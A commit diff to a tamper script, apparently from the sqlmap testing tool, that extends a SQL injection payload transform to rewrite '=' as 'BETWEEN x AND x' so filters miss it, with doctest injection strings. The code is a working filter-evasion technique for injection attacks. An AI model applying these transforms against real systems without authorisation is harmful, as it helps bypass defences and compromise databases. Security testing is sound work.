Minor improvement of between tamper script

stamparm · stamparm · commit efa3c3e45157 · 2014-04-22T11:04:28.000+02:00
diff --git a/tamper/between.py b/tamper/between.py
@@ -17,6 +17,7 @@ def dependencies():
 def tamper(payload, **kwargs):
     """
     Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
+    Replaces equals operator ('=') with 'BETWEEN # AND #'
 
     Tested against:
         * Microsoft SQL Server 2005
@@ -32,6 +33,8 @@ def tamper(payload, **kwargs):
 
     >>> tamper('1 AND A > B--')
     '1 AND A NOT BETWEEN 0 AND B--'
+    >>> tamper('1 AND A = B--')
+    '1 AND A BETWEEN B AND B--'
     """
 
     retVal = payload
@@ -45,4 +48,12 @@ def tamper(payload, **kwargs):
         else:
             retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload)
 
+        if retVal == payload:
+            match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*(\w+)\s*", payload)
+
+            if match:
+                _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
+                retVal = retVal.replace(match.group(0), _)
+            
+
     return retVal
